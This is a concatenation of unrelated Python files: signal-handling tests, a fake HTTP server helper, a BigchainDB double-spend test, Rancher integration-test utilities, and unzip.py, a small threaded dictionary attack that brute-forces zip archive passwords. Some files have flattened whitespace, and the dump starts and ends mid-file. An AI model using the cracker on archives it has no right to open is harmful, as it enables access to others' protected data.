Ideally the signal is received # when inside critical signal-handling routines such as # Py_MakePendingCalls(). signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5) def second_handler(signum=None, frame=None): sigs.append(signum) # Here on Linux, SIGPROF > SIGALRM > SIGUSR1. By using both # ascending and descending sequences (SIGUSR1 then SIGALRM, # SIGPROF then SIGALRM), we maximize chances of hitting a bug. self.setsig(signal.SIGPROF, first_handler) self.setsig(signal.SIGUSR1, first_handler) self.setsig(signal.SIGALRM, second_handler) # for ITIMER_REAL expected_sigs = 0 deadline = time.monotonic() + 15.0 while expected_sigs < N: os.kill(os.getpid(), signal.SIGPROF) expected_sigs += 1 # Wait for handlers to run to avoid signal coalescing while len(sigs) < expected_sigs and time.monotonic() < deadline: time.sleep(1e-5) os.kill(os.getpid(), signal.SIGUSR1) expected_sigs += 1 while len(sigs) < expected_sigs and time.monotonic() < deadline: time.sleep(1e-5) # All ITIMER_REAL signals should have been delivered to the # Python handler self.assertEqual(len(sigs), N, "Some signals were lost") @unittest.skipUnless(hasattr(signal, "setitimer"), "test needs setitimer()") def test_stress_delivery_simultaneous(self): """ This test uses simultaneous signal handlers. """ N = self.decide_itimer_count() sigs = [] def handler(signum, frame): sigs.append(signum) self.setsig(signal.SIGUSR1, handler) self.setsig(signal.SIGALRM, handler) # for ITIMER_REAL expected_sigs = 0 deadline = time.monotonic() + 15.0 while expected_sigs < N: # Hopefully the SIGALRM will be received somewhere during # initial processing of SIGUSR1. signal.setitimer(signal.ITIMER_REAL, 1e-6 + random.random() * 1e-5) os.kill(os.getpid(), signal.SIGUSR1) expected_sigs += 2 # Wait for handlers to run to avoid signal coalescing while len(sigs) < expected_sigs and time.monotonic() < deadline: time.sleep(1e-5) # All ITIMER_REAL signals should have been delivered to the # Python handler self.assertEqual(len(sigs), N, "Some signals were lost") # TODO: RUSTPYTHON @unittest.expectedFailure @unittest.skipUnless(hasattr(signal, "SIGUSR1"), "test needs SIGUSR1") def test_stress_modifying_handlers(self): # bpo-43406: race condition between trip_signal() and signal.signal signum = signal.SIGUSR1 num_sent_signals = 0 num_received_signals = 0 do_stop = False def custom_handler(signum, frame): nonlocal num_received_signals num_received_signals += 1 def set_interrupts(): nonlocal num_sent_signals while not do_stop: signal.raise_signal(signum) num_sent_signals += 1 def cycle_handlers(): while num_sent_signals < 100: for i in range(20000): # Cycle between a Python-defined and a non-Python handler for handler in [custom_handler, signal.SIG_IGN]: signal.signal(signum, handler) old_handler = signal.signal(signum, custom_handler) self.addCleanup(signal.signal, signum, old_handler) t = threading.Thread(target=set_interrupts) try: ignored = False with support.catch_unraisable_exception() as cm: t.start() cycle_handlers() do_stop = True t.join() if cm.unraisable is not None: # An unraisable exception may be printed out when # a signal is ignored due to the aforementioned # race condition, check it. self.assertIsInstance(cm.unraisable.exc_value, OSError) self.assertIn( f"Signal {signum} ignored due to race condition", str(cm.unraisable.exc_value)) ignored = True # bpo-43406: Even if it is unlikely, it's technically possible that # all signals were ignored because of race conditions. 
if not ignored: # Sanity check that some signals were received, but not all self.assertGreater(num_received_signals, 0) self.assertLess(num_received_signals, num_sent_signals) finally: do_stop = True t.join() class RaiseSignalTest(unittest.TestCase): # TODO: RUSTPYTHON @unittest.expectedFailure def test_sigint(self): with self.assertRaises(KeyboardInterrupt): signal.raise_signal(signal.SIGINT) # TODO: RUSTPYTHON @unittest.expectedFailure @unittest.skipIf(sys.platform != "win32", "Windows specific test") def test_invalid_argument(self): try: SIGHUP = 1 # not supported on win32 signal.raise_signal(SIGHUP) self.fail("OSError (Invalid argument) expected") except OSError as e: if e.errno == errno.EINVAL: pass else: raise # TODO: RUSTPYTHON @unittest.expectedFailure def test_handler(self): is_ok = False def handler(a, b): nonlocal is_ok is_ok = True old_signal = signal.signal(signal.SIGINT, handler) self.addCleanup(signal.signal, signal.SIGINT, old_signal) signal.raise_signal(signal.SIGINT) self.assertTrue(is_ok) def tearDownModule(): support.reap_children() if __name__ == "__main__": unittest.main()
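# --- Illustrative sketch (not part of test_signal.py above) ---
# A minimal, hedged demonstration of the wakeup-fd mechanism those tests
# exercise: the C-level signal handler writes each arriving signal number
# into a non-blocking pipe registered via signal.set_wakeup_fd(), so an
# event loop can learn about signals by reading that pipe. POSIX-only
# (SIGUSR1); the helper name below is ours, not part of the test module.
import os
import signal


def demo_wakeup_fd():
    read_fd, write_fd = os.pipe()
    os.set_blocking(write_fd, False)   # the wakeup fd must be non-blocking
    old_fd = signal.set_wakeup_fd(write_fd)
    old_handler = signal.signal(signal.SIGUSR1, lambda signum, frame: None)
    try:
        signal.raise_signal(signal.SIGUSR1)
        data = os.read(read_fd, 16)
        # each byte is the number of a signal that arrived, e.g. [10] on Linux
        return [int(b) for b in data]
    finally:
        signal.signal(signal.SIGUSR1, old_handler)
        signal.set_wakeup_fd(old_fd)
        os.close(read_fd)
        os.close(write_fd)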
httpserver.py
# Copyright 2014 The LUCI Authors. All rights reserved.
# Use of this source code is governed under the Apache License, Version 2.0
# that can be found in the LICENSE file.

import json
import logging
import threading

from six.moves import BaseHTTPServer
from six.moves import http_client


_STOP_EVENT = '/fakeserver/__stop__'


class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
    """Handler implements utility functions to help implement a fake."""

    ### Public methods

    def send_json(self, data):
        """Sends a JSON response."""
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(json.dumps(data).encode())

    def send_octet_stream(self, data, headers=None):
        """Sends a binary response."""
        self.send_response(200)
        self.send_header('Content-type', 'application/octet-stream')
        for key, value in (headers or {}).items():
            self.send_header(key, value)
        self.end_headers()
        self.wfile.write(data)

    def read_body(self):
        """Reads the request body."""
        return self.rfile.read(int(self.headers['Content-Length']))

    def yield_body(self):
        """Yields the request body in 4 KiB chunks."""
        size = int(self.headers['Content-Length'])
        while size:
            chunk = min(4096, size)
            yield self.rfile.read(chunk)
            size -= chunk

    ### Overrides from BaseHTTPRequestHandler

    def do_OPTIONS(self):
        if self.path == _STOP_EVENT:
            self.server.parent._stopped = True
        self.send_octet_stream(b'')

    def log_message(self, fmt, *args):
        logging.info(
            '%s - - [%s] %s',
            self.address_string(), self.log_date_time_string(), fmt % args)


class Server(object):
    """Server implements a simple HTTP server to implement a fake."""
    _HANDLER_CLS = None

    def __init__(self):
        assert issubclass(self._HANDLER_CLS, Handler), self._HANDLER_CLS
        self._closed = False
        self._stopped = False
        self._server = BaseHTTPServer.HTTPServer(
            ('127.0.0.1', 0), self._HANDLER_CLS)
        self._server.parent = self
        self._server.url = self.url = 'http://127.0.0.1:%d' % (
            self._server.server_port)
        self._thread = threading.Thread(target=self._run, name='httpd')
        self._thread.daemon = True
        self._thread.start()
        logging.info('%s', self.url)

    def close(self):
        assert not self._closed
        self._closed = True
        self._send_event(_STOP_EVENT)
        self._thread.join()

    def _run(self):
        while not self._stopped:
            self._server.handle_request()
        self._server.server_close()

    def _send_event(self, path):
        conn = http_client.HTTPConnection(
            '127.0.0.1:%d' % self._server.server_port, timeout=60)
        try:
            conn.request('OPTIONS', path)
            conn.getresponse()
        finally:
            conn.close()
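# --- Illustrative usage sketch (not part of httpserver.py above) ---
# Hedged example of how the module appears meant to be used: subclass Handler
# with the do_* methods a fake needs, bind it to a Server subclass through
# _HANDLER_CLS, then issue requests against server.url. It assumes the file
# above is importable as `httpserver`; FakeHandler, FakeServer and the
# '/ping' route are illustrative names, not part of the module.
import httpserver


class FakeHandler(httpserver.Handler):
    def do_GET(self):
        if self.path == '/ping':
            self.send_json({'status': 'ok'})
        else:
            self.send_response(404)
            self.end_headers()


class FakeServer(httpserver.Server):
    _HANDLER_CLS = FakeHandler


if __name__ == '__main__':
    server = FakeServer()      # binds an ephemeral port on 127.0.0.1
    try:
        print(server.url)      # e.g. http://127.0.0.1:<port>
        # any HTTP client can now GET server.url + '/ping'
    finally:
        server.close()         # sends the stop event and joins the thread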
unzip.py
#!/usr/bin/env python3
import optparse
import zipfile
from threading import Thread


def banner():
    print("[***] Unzipper p29 [***]")
    print("")


def extractFile(zFile, password):
    try:
        # zipfile expects the password as bytes
        zFile.extractall(pwd=password.encode('utf-8'))
        print("[+] Found password: " + password + "\n")
    except Exception:
        pass


def main():
    banner()
    parser = optparse.OptionParser("usage: %prog -f <zipfile> -d <dictionary>")
    parser.add_option('-f', dest='zname', type='string',
                      help='specify zip file')
    parser.add_option('-d', dest='dname', type='string',
                      help='specify dictionary file')
    (options, args) = parser.parse_args()
    if options.zname is None or options.dname is None:
        print(parser.usage)
        exit(0)
    else:
        zname = options.zname
        dname = options.dname

    zFile = zipfile.ZipFile(zname)
    passFile = open(dname)
    # try every candidate password from the dictionary in its own thread
    for line in passFile.readlines():
        password = line.strip('\n')
        t = Thread(target=extractFile, args=(zFile, password))
        t.start()


if __name__ == '__main__':
    main()
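# --- Illustrative usage (not part of unzip.py above) ---
# Hedged example invocation; the file names are placeholders:
#
#   python3 unzip.py -f protected.zip -d wordlist.txt
#
# Each candidate password from wordlist.txt is tried in its own thread. Note
# that ZipCrypto's one-byte password check occasionally lets a wrong password
# through without raising, so a reported hit is worth verifying.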
test_double_spend.py
# Copyright BigchainDB GmbH and BigchainDB contributors
# SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0)
# Code is Apache-2.0 and docs are CC-BY-4.0

# # Double Spend testing
# This test challenges the system with double spends.

import os
from uuid import uuid4
from threading import Thread
import queue

import bigchaindb_driver.exceptions
from bigchaindb_driver import BigchainDB
from bigchaindb_driver.crypto import generate_keypair


def test_double_create():
    bdb = BigchainDB(os.environ.get('BIGCHAINDB_ENDPOINT'))
    alice = generate_keypair()
    results = queue.Queue()

    tx = bdb.transactions.fulfill(
        bdb.transactions.prepare(
            operation='CREATE',
            signers=alice.public_key,
            asset={'data': {'uuid': str(uuid4())}}),
        private_keys=alice.private_key)

    def send_and_queue(tx):
        try:
            bdb.transactions.send(tx)
            results.put('OK')
        except bigchaindb_driver.exceptions.TransportError as e:
            results.put('FAIL')

    t1 = Thread(target=send_and_queue, args=(tx, ))
    t2 = Thread(target=send_and_queue, args=(tx, ))

    t1.start()
    t2.start()

    results = [results.get(timeout=2), results.get(timeout=2)]

    assert results.count('OK') == 1
    assert results.count('FAIL') == 1
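# --- Illustrative usage (not part of test_double_spend.py above) ---
# Hedged example of running the test; the endpoint is a placeholder for a
# reachable BigchainDB node (9984 is the usual HTTP API port):
#
#   BIGCHAINDB_ENDPOINT=http://localhost:9984 pytest test_double_spend.py
#
# The test submits the same CREATE transaction from two threads and expects
# exactly one 'OK' (accepted) and one 'FAIL' (rejected as a duplicate).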
common.py
import inspect import json import os import random import subprocess import ssl import time import requests import ast import paramiko import rancher import pytest from urllib.parse import urlparse from rancher import ApiError from lib.aws import AmazonWebServices from copy import deepcopy from threading import Lock from threading import Thread import websocket import base64 DEFAULT_TIMEOUT = 120 DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300 DEFAULT_APP_DELETION_TIMEOUT = 360 DEFAULT_MONITORING_TIMEOUT = 180 DEFAULT_CATALOG_TIMEOUT = 15 CATTLE_TEST_URL = os.environ.get('CATTLE_TEST_URL', "") CATTLE_API_URL = CATTLE_TEST_URL + "/v3" CATTLE_AUTH_URL = \ CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login" ADMIN_TOKEN = os.environ.get('ADMIN_TOKEN', "None") USER_TOKEN = os.environ.get('USER_TOKEN', "None") USER_PASSWORD = os.environ.get('USER_PASSWORD', "None") ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None") kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)), "k8s_kube_config") MACHINE_TIMEOUT = float(os.environ.get('RANCHER_MACHINE_TIMEOUT', "1200")) TEST_OS = os.environ.get('RANCHER_TEST_OS', "linux") TEST_IMAGE = os.environ.get('RANCHER_TEST_IMAGE', "sangeetha/mytestcontainer") TEST_IMAGE_NGINX = os.environ.get('RANCHER_TEST_IMAGE_NGINX', "nginx") TEST_IMAGE_OS_BASE = os.environ.get('RANCHER_TEST_IMAGE_OS_BASE', "ubuntu") if TEST_OS == "windows": DEFAULT_TIMEOUT = 300 skip_test_windows_os = pytest.mark.skipif( TEST_OS == "windows", reason='Tests Skipped for including Windows nodes cluster') CLUSTER_NAME = os.environ.get("RANCHER_CLUSTER_NAME", "") RANCHER_CLEANUP_CLUSTER = \ ast.literal_eval(os.environ.get('RANCHER_CLEANUP_CLUSTER', "True")) env_file = os.path.join( os.path.dirname(os.path.realpath(__file__)), "rancher_env.config") AWS_ACCESS_KEY_ID = os.environ.get("AWS_ACCESS_KEY_ID") AWS_SECRET_ACCESS_KEY = os.environ.get("AWS_SECRET_ACCESS_KEY") AWS_REGION = os.environ.get("AWS_REGION") AWS_SUBNET = os.environ.get("AWS_SUBNET") AWS_VPC = os.environ.get("AWS_VPC") AWS_SG = os.environ.get("AWS_SG") AWS_ZONE = os.environ.get("AWS_ZONE") AWS_IAM_PROFILE = os.environ.get("AWS_IAM_PROFILE", "") AWS_S3_BUCKET_NAME = os.environ.get("AWS_S3_BUCKET_NAME", "") AWS_S3_BUCKET_FOLDER_NAME = os.environ.get("AWS_S3_BUCKET_FOLDER_NAME", "") LINODE_ACCESSKEY = os.environ.get('RANCHER_LINODE_ACCESSKEY', "None") NFS_SERVER_MOUNT_PATH = "/nfs" TEST_RBAC = ast.literal_eval(os.environ.get('RANCHER_TEST_RBAC', "False")) if_test_rbac = pytest.mark.skipif(TEST_RBAC is False, reason='rbac tests are skipped') TEST_ALL_SNAPSHOT = ast.literal_eval( os.environ.get('RANCHER_TEST_ALL_SNAPSHOT', "False") ) if_test_all_snapshot = \ pytest.mark.skipif(TEST_ALL_SNAPSHOT is False, reason='Snapshots check tests are skipped') DATA_SUBDIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'resource') # As of release 2.4 default rke scan profile is "rke-cis-1.4" CIS_SCAN_PROFILE = os.environ.get('RANCHER_CIS_SCAN_PROFILE', "rke-cis-1.4") # here are all supported roles for RBAC testing CLUSTER_MEMBER = "cluster-member" CLUSTER_OWNER = "cluster-owner" PROJECT_MEMBER = "project-member" PROJECT_OWNER = "project-owner" PROJECT_READ_ONLY = "read-only" rbac_data = { "project": None, "namespace": None, "workload": None, "p_unshared": None, "ns_unshared": None, "wl_unshared": None, "users": { CLUSTER_OWNER: {}, CLUSTER_MEMBER: {}, PROJECT_OWNER: {}, PROJECT_MEMBER: {}, PROJECT_READ_ONLY: {}, } } auth_rbac_data = { "project": None, "namespace": None, "users": {} } # here are the global role 
templates used for # testing globalRoleBinding and groupRoleBinding TEMPLATE_MANAGE_CATALOG = { "newUserDefault": "false", "rules": [ { "type": "/v3/schemas/policyRule", "apiGroups": [ "management.cattle.io" ], "verbs": [ "*" ], "resources": [ "catalogs", "templates", "templateversions" ] } ], "name": "gr-test-manage-catalog", } TEMPLATE_LIST_CLUSTER = { "newUserDefault": "false", "rules": [ { "type": "/v3/schemas/policyRule", "apiGroups": [ "management.cattle.io" ], "verbs": [ "get", "list", "watch" ], "resources": [ "clusters" ] } ], "name": "gr-test-list-cluster", } # this is used when testing users from a auth provider AUTH_PROVIDER = os.environ.get('RANCHER_AUTH_PROVIDER', "") if AUTH_PROVIDER not in ["activeDirectory", "freeIpa", "openLdap", ""]: pytest.fail("Invalid RANCHER_AUTH_PROVIDER. Please provide one of: " "activeDirectory, freeIpa, or openLdap (case sensitive).") NESTED_GROUP_ENABLED = ast.literal_eval( os.environ.get('RANCHER_NESTED_GROUP_ENABLED', "False")) # Admin Auth username and the shared password for all auth users AUTH_USER_PASSWORD = os.environ.get('RANCHER_AUTH_USER_PASSWORD', "") # the link to log in as an auth user LOGIN_AS_AUTH_USER_URL = \ CATTLE_TEST_URL + "/v3-public/" \ + AUTH_PROVIDER + "Providers/" \ + AUTH_PROVIDER.lower() + "?action=login" CATTLE_AUTH_PRINCIPAL_URL = CATTLE_TEST_URL + "/v3/principals?action=search" # This is used for nested group when a third part Auth is enabled nested_group = { "auth_info": None, "users": None, "group_dic": None, "groups": None } auth_requirements = not AUTH_PROVIDER or not AUTH_USER_PASSWORD if_test_group_rbac = pytest.mark.skipif( auth_requirements, reason='Group RBAC tests are skipped.' 'Required AUTH env variables ' 'have not been set.' ) def is_windows(os_type=TEST_OS): return os_type == "windows" def random_str(): return 'random-{0}-{1}'.format(random_num(), int(time.time())) def random_num(): return random.randint(0, 1000000) def random_int(start, end): return random.randint(start, end) def random_test_name(name="test"): return name + "-" + str(random_int(10000, 99999)) def get_admin_client(): return rancher.Client(url=CATTLE_API_URL, token=ADMIN_TOKEN, verify=False) def get_user_client(): return rancher.Client(url=CATTLE_API_URL, token=USER_TOKEN, verify=False) def get_client_for_token(token, url=CATTLE_API_URL): return rancher.Client(url=url, token=token, verify=False) def get_project_client_for_token(project, token): p_url = project.links['self'] + '/schemas' p_client = rancher.Client(url=p_url, token=token, verify=False) return p_client def get_cluster_client_for_token(cluster, token): c_url = cluster.links['self'] + '/schemas' c_client = rancher.Client(url=c_url, token=token, verify=False) return c_client def up(cluster, token): c_url = cluster.links['self'] + '/schemas' c_client = rancher.Client(url=c_url, token=token, verify=False) return c_client def wait_state(client, obj, state, timeout=DEFAULT_TIMEOUT): wait_for(lambda: client.reload(obj).state == state, timeout) return client.reload(obj) def wait_for_condition(client, resource, check_function, fail_handler=None, timeout=DEFAULT_TIMEOUT): start = time.time() resource = client.reload(resource) while not check_function(resource): if time.time() - start > timeout: exceptionMsg = 'Timeout waiting for ' + resource.baseType + \ ' to satisfy condition: ' + \ inspect.getsource(check_function) if fail_handler: exceptionMsg = exceptionMsg + fail_handler(resource) raise Exception(exceptionMsg) time.sleep(.5) resource = client.reload(resource) return resource 
def wait_for(callback, timeout=DEFAULT_TIMEOUT, timeout_message=None): start = time.time() ret = callback() while ret is None or ret is False: time.sleep(.5) if time.time() - start > timeout: if timeout_message: raise Exception(timeout_message) else: raise Exception('Timeout waiting for condition') ret = callback() return ret def random_name(): return "test" + "-" + str(random_int(10000, 99999)) def get_setting_value_by_name(name): settings_url = CATTLE_API_URL + "/settings/" + name head = {'Authorization': 'Bearer ' + ADMIN_TOKEN} response = requests.get(settings_url, verify=False, headers=head) return response.json()["value"] # Return value is negative if v1 < v2, zero if v1 == v2 and positive if v1 > v2 def compare_versions(v1, v2): if tuple(map(int, (v1.split(".")))) > tuple(map(int, (v2.split(".")))): return 1 elif tuple(map(int, (v1.split(".")))) < tuple(map(int, (v2.split(".")))): return -1 else: return 0 def create_project_and_ns(token, cluster, project_name=None, ns_name=None): server_url = cluster.links['self'].split("/clusters")[0] client = get_client_for_token(token, server_url) p = create_project(client, cluster, project_name) c_client = get_cluster_client_for_token(cluster, token) ns = create_ns(c_client, cluster, p, ns_name) return p, ns def create_project(client, cluster, project_name=None): if project_name is None: project_name = random_name() p = client.create_project(name=project_name, clusterId=cluster.id) time.sleep(5) p = wait_until_available(client, p) assert p.state == 'active' return p def create_project_with_pspt(client, cluster, pspt): p = client.create_project(name=random_name(), clusterId=cluster.id) p = wait_until_available(client, p) assert p.state == 'active' return set_pspt_for_project(p, client, pspt) def set_pspt_for_project(project, client, pspt): project.setpodsecuritypolicytemplate(podSecurityPolicyTemplateId=pspt.id) project = wait_until_available(client, project) assert project.state == 'active' return project def create_ns(client, cluster, project, ns_name=None): if ns_name is None: ns_name = random_name() ns = client.create_namespace(name=ns_name, clusterId=cluster.id, projectId=project.id) wait_for_ns_to_become_active(client, ns) ns = client.reload(ns) assert ns.state == 'active' return ns def assign_members_to_cluster(client, user, cluster, role_template_id): crtb = client.create_cluster_role_template_binding( clusterId=cluster.id, roleTemplateId=role_template_id, subjectKind="User", userId=user.id) return crtb def assign_members_to_project(client, user, project, role_template_id): prtb = client.create_project_role_template_binding( projectId=project.id, roleTemplateId=role_template_id, subjectKind="User", userId=user.id) return prtb def change_member_role_in_cluster(client, user, crtb, role_template_id): crtb = client.update( crtb, roleTemplateId=role_template_id, userId=user.id) return crtb def change_member_role_in_project(client, user, prtb, role_template_id): prtb = client.update( prtb, roleTemplateId=role_template_id, userId=user.id) return prtb def create_kubeconfig(cluster, file_name=kube_fname): generateKubeConfigOutput = cluster.generateKubeconfig() print(generateKubeConfigOutput.config) file = open(file_name, "w") file.write(generateKubeConfigOutput.config) file.close() def validate_psp_error_worklaod(p_client, workload, error_message): workload = wait_for_wl_transitioning(p_client, workload) assert workload.state == "updating" assert workload.transitioning == "error" print(workload.transitioningMessage) assert error_message in 
workload.transitioningMessage def validate_all_workload_image_from_rancher(project_client, ns, pod_count=1, ignore_pod_count=False, deployment_list=None, daemonset_list=None, cronjob_list=None): if cronjob_list is None: cronjob_list = [] if daemonset_list is None: daemonset_list = [] if deployment_list is None: deployment_list = [] workload_list = deployment_list + daemonset_list + cronjob_list wls = project_client.list_workload(namespaceId=ns.id).data assert len(workload_list) == len(wls), \ "Expected {} workload(s) to be present in {} namespace " \ "but there were {}".format(len(workload_list), ns.name, len(wls)) for workload_name in workload_list: workloads = project_client.list_workload(name=workload_name, namespaceId=ns.id).data assert len(workloads) == workload_list.count(workload_name), \ "Expected {} workload(s) to be present with name {} " \ "but there were {}".format(workload_list.count(workload_name), workload_name, len(workloads)) for workload in workloads: for container in workload.containers: assert str(container.image).startswith("rancher/") if workload_name in deployment_list: validate_workload(project_client, workload, "deployment", ns.name, pod_count=pod_count, ignore_pod_count=ignore_pod_count) deployment_list.remove(workload_name) if workload_name in daemonset_list: validate_workload(project_client, workload, "daemonSet", ns.name, pod_count=pod_count, ignore_pod_count=ignore_pod_count) daemonset_list.remove(workload_name) if workload_name in cronjob_list: validate_workload(project_client, workload, "cronJob", ns.name, pod_count=pod_count, ignore_pod_count=ignore_pod_count) cronjob_list.remove(workload_name) # Final assertion to ensure all expected workloads have been validated assert not deployment_list + daemonset_list + cronjob_list def validate_workload(p_client, workload, type, ns_name, pod_count=1, wait_for_cron_pods=60, ignore_pod_count=False): workload = wait_for_wl_to_active(p_client, workload) assert workload.state == "active" # For cronjob, wait for the first pod to get created after # scheduled wait time if type == "cronJob": time.sleep(wait_for_cron_pods) if ignore_pod_count: pods = p_client.list_pod(workloadId=workload.id).data else: pods = wait_for_pods_in_workload(p_client, workload, pod_count) assert len(pods) == pod_count pods = p_client.list_pod(workloadId=workload.id).data assert len(pods) == pod_count for pod in pods: p = wait_for_pod_to_running(p_client, pod) assert p["status"]["phase"] == "Running" wl_result = execute_kubectl_cmd( "get " + type + " " + workload.name + " -n " + ns_name) if type == "deployment" or type == "statefulSet": assert wl_result["status"]["readyReplicas"] == len(pods) if type == "daemonSet": assert wl_result["status"]["currentNumberScheduled"] == len(pods) if type == "cronJob": assert len(wl_result["status"]["active"]) >= len(pods) def validate_workload_with_sidekicks(p_client, workload, type, ns_name, pod_count=1): workload = wait_for_wl_to_active(p_client, workload) assert workload.state == "active" pods = wait_for_pods_in_workload(p_client, workload, pod_count) assert len(pods) == pod_count for pod in pods: wait_for_pod_to_running(p_client, pod) wl_result = execute_kubectl_cmd( "get " + type + " " + workload.name + " -n " + ns_name) assert wl_result["status"]["readyReplicas"] == pod_count for key, value in workload.workloadLabels.items(): label = key + "=" + value get_pods = "get pods -l" + label + " -n " + ns_name execute_kubectl_cmd(get_pods) pods_result = execute_kubectl_cmd(get_pods) assert len(pods_result["items"]) == 
pod_count for pod in pods_result["items"]: assert pod["status"]["phase"] == "Running" assert len(pod["status"]["containerStatuses"]) == 2 assert "running" in pod["status"]["containerStatuses"][0]["state"] assert "running" in pod["status"]["containerStatuses"][1]["state"] def validate_workload_paused(p_client, workload, expectedstatus): workloadStatus = p_client.list_workload(uuid=workload.uuid).data[0].paused assert workloadStatus == expectedstatus def validate_pod_images(expectedimage, workload, ns_name): for key, value in workload.workloadLabels.items(): label = key + "=" + value get_pods = "get pods -l" + label + " -n " + ns_name pods = execute_kubectl_cmd(get_pods) for pod in pods["items"]: assert pod["spec"]["containers"][0]["image"] == expectedimage def validate_pods_are_running_by_id(expectedpods, workload, ns_name): for key, value in workload.workloadLabels.items(): label = key + "=" + value get_pods = "get pods -l" + label + " -n " + ns_name pods = execute_kubectl_cmd(get_pods) curpodnames = [] for pod in pods["items"]: curpodnames.append(pod["metadata"]["name"]) for expectedpod in expectedpods["items"]: assert expectedpod["metadata"]["name"] in curpodnames def validate_workload_image(client, workload, expectedImage, ns): workload = client.list_workload(uuid=workload.uuid).data[0] assert workload.containers[0].image == expectedImage validate_pod_images(expectedImage, workload, ns.name) def execute_kubectl_cmd(cmd, json_out=True, stderr=False, kubeconfig=kube_fname): command = 'kubectl --kubeconfig {0} {1}'.format( kubeconfig, cmd) if json_out: command += ' -o json' print("run cmd: \t{0}".format(command)) if stderr: result = run_command_with_stderr(command, False) else: result = run_command(command, False) print("returns: \t{0}".format(result)) if json_out: result = json.loads(result) return result def run_command(command, log_out=True): if log_out: print("run cmd: \t{0}".format(command)) try: return subprocess.check_output(command, shell=True, text=True) except subprocess.CalledProcessError as e: return None def run_command_with_stderr(command, log_out=True): if log_out: print("run cmd: \t{0}".format(command)) try: output = subprocess.check_output(command, shell=True, stderr=subprocess.PIPE) returncode = 0 except subprocess.CalledProcessError as e: output = e.stderr returncode = e.returncode if log_out: print("return code: \t{0}".format(returncode)) if returncode != 0: print("output: \t{0}".format(output)) return output def wait_for_wl_to_active(client, workload, timeout=DEFAULT_TIMEOUT): start = time.time() workloads = client.list_workload(uuid=workload.uuid).data assert len(workloads) == 1 wl = workloads[0] while wl.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) workloads = client.list_workload(uuid=workload.uuid).data assert len(workloads) == 1 wl = workloads[0] return wl def wait_for_ingress_to_active(client, ingress, timeout=DEFAULT_TIMEOUT): start = time.time() ingresses = client.list_ingress(uuid=ingress.uuid).data assert len(ingresses) == 1 wl = ingresses[0] while wl.state != "active": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) ingresses = client.list_ingress(uuid=ingress.uuid).data assert len(ingresses) == 1 wl = ingresses[0] return wl def wait_for_wl_transitioning(client, workload, timeout=DEFAULT_TIMEOUT, state="error"): start = time.time() workloads = client.list_workload(uuid=workload.uuid).data assert 
len(workloads) == 1 wl = workloads[0] while wl.transitioning != state: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) workloads = client.list_workload(uuid=workload.uuid).data assert len(workloads) == 1 wl = workloads[0] return wl def wait_for_pod_to_running(client, pod, timeout=DEFAULT_TIMEOUT): start = time.time() pods = client.list_pod(uuid=pod.uuid).data assert len(pods) == 1 p = pods[0] while p.state != "running": if time.time() - start > timeout: raise AssertionError( "Timed out waiting for state to get to active") time.sleep(.5) pods = client.list_pod(uuid=pod.uuid).data assert len(pods) == 1 p = pods[0] return p def get_schedulable_nodes(cluster, client=None, os_type=TEST_OS): if not client: client = get_user_client() nodes = client.list_node(clusterId=cluster.id).data schedulable_nodes = [] for node in nodes: if node.worker and (not node.unschedulable): for key, val in node.labels.items(): # Either one of the labels should be present on the node if key == 'kubernetes.io/os' or key == 'beta.kubernetes.io/os': if val == os_type: schedulable_nodes.append(node) break # Including master in list of nodes as master is also schedulable if 'k3s' in cluster.version["gitVersion"] and node.controlPlane: schedulable_nodes.append(node) return schedulable_nodes def get_etcd_nodes(cluster, client=None): if not client: client = get_user_client() nodes = client.list_node(clusterId=cluster.id).data etcd_nodes = [] for node in nodes: if node.etcd: etcd_nodes.append(node) return etcd_nodes def get_role_nodes(cluster, role, client=None): etcd_nodes = [] control_nodes = [] worker_nodes = [] node_list = [] if not client: client = get_user_client() nodes = client.list_node(clusterId=cluster.id).data for node in nodes: if node.etcd: etcd_nodes.append(node) if node.controlPlane: control_nodes.append(node) if node.worker: worker_nodes.append(node) if role == "etcd": node_list = etcd_nodes if role == "control": node_list = control_nodes if role == "worker": node_list = worker_nodes return node_list def validate_ingress(p_client, cluster, workloads, host, path, insecure_redirect=False): time.sleep(10) curl_args = " " if (insecure_redirect): curl_args = " -L --insecure " if len(host) > 0: curl_args += " --header 'Host: " + host + "'" nodes = get_schedulable_nodes(cluster, os_type="linux") target_name_list = get_target_names(p_client, workloads) for node in nodes: host_ip = resolve_node_ip(node) url = "http://" + host_ip + path if not insecure_redirect: wait_until_ok(url, timeout=300, headers={ "Host": host }) cmd = curl_args + " " + url validate_http_response(cmd, target_name_list) def validate_ingress_using_endpoint(p_client, ingress, workloads, timeout=300, certcheck=False, is_insecure=False): target_name_list = get_target_names(p_client, workloads) start = time.time() fqdn_available = False url = None while not fqdn_available: if time.time() - start > timeout: raise AssertionError( "Timed out waiting for endpoint to be available") time.sleep(.5) ingress_list = p_client.list_ingress(uuid=ingress.uuid).data assert len(ingress_list) == 1 ingress = ingress_list[0] if hasattr(ingress, 'publicEndpoints'): for public_endpoint in ingress.publicEndpoints: if public_endpoint["hostname"].startswith(ingress.name) \ or certcheck: fqdn_available = True url = \ public_endpoint["protocol"].lower() + "://" + \ public_endpoint["hostname"] if "path" in public_endpoint.keys(): url += public_endpoint["path"] time.sleep(10) validate_http_response(url, 
